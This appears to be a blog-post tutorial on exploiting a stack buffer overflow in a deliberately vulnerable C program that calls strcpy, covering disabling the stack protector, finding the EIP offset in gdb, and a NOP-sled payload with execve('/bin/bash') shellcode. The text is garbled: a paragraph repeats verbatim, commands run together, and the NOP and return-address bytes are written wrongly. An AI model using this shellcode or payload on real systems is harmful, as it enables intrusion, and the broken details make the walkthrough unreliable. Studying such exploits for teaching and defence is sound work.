script program
/ / I am a vulnerable thing.
# include <stdio.h>
# include <string.h>
int main (int argc, char ** argv)
{
char buffer [500];
strcpy (buffer, argv [1]) / / Vulnerable function!
return 0;
}
It's time to compile the C program that was created earlier.
root @ bt: ~ / linuxexp # gcc-ggdb-o prog prog.c
Change the SSP off by adding "-fno-stack-protector" to gcc when compiling
root @ bt: ~ / linuxexp # gcc-o prog-ggdb-fno-stack-protector-mpreferred-stack-boundary = 2 prog.c
Now create a fuzzer to try to find the offset needed to overwrite the EIP and we can look at byte 508 EIP overwrite
Now we are looking for an address before the ESP kicks strcpy function by reducing the 200 bytes of what we get. We'll get the address of ESP before 200 byte out of buffer.sekarang let's try to find out the address of the ESP and reduce the 200 byte of it
Using the "list" command in gdb we take a look at the source code, than we put a breakpoint ad the
vulnerable function normally and run the program to find out the address of our ESP.
So ESP is 0xbffff26c (make sure you try it at least 2 times like in my example just to make-sure). if we
Subtract 200 from ESP we will get: 0xbffff26c - 200 = 0xbffff06c.
Cool with what we now know the address to overwrite the EIP, we know that we need 508 bytes to overwrite
EIP so let's see how We Could exploit the structure.
vulnerable function normally and run the program to find out the address of our ESP.
So ESP is 0xbffff26c (make sure you try it at least 2 times like in my example just to make-sure). if we
Subtract 200 from ESP we will get: 0xbffff26c - 200 = 0xbffff06c.
Cool with what we now know the address to overwrite the EIP, we know that we need 508 bytes to overwrite
EIP so let's see how We Could exploit the structure.
(gdb) run $(python -c 'print "x90"*323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x78\x39\x30\78" * 35'
Our EIP gets overwritten with 0x78303978 … doesn’t this look
familiar !? We are trying to overwrite it with
0x78303978, this is just a small issue so let’s quickly add one
more nop and relaunch the exploit.
(gdb)
run $(python -c 'print "x90"*370 +
"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
+ "\x78\x39\x30\78" * 35'
No comments:
Post a Comment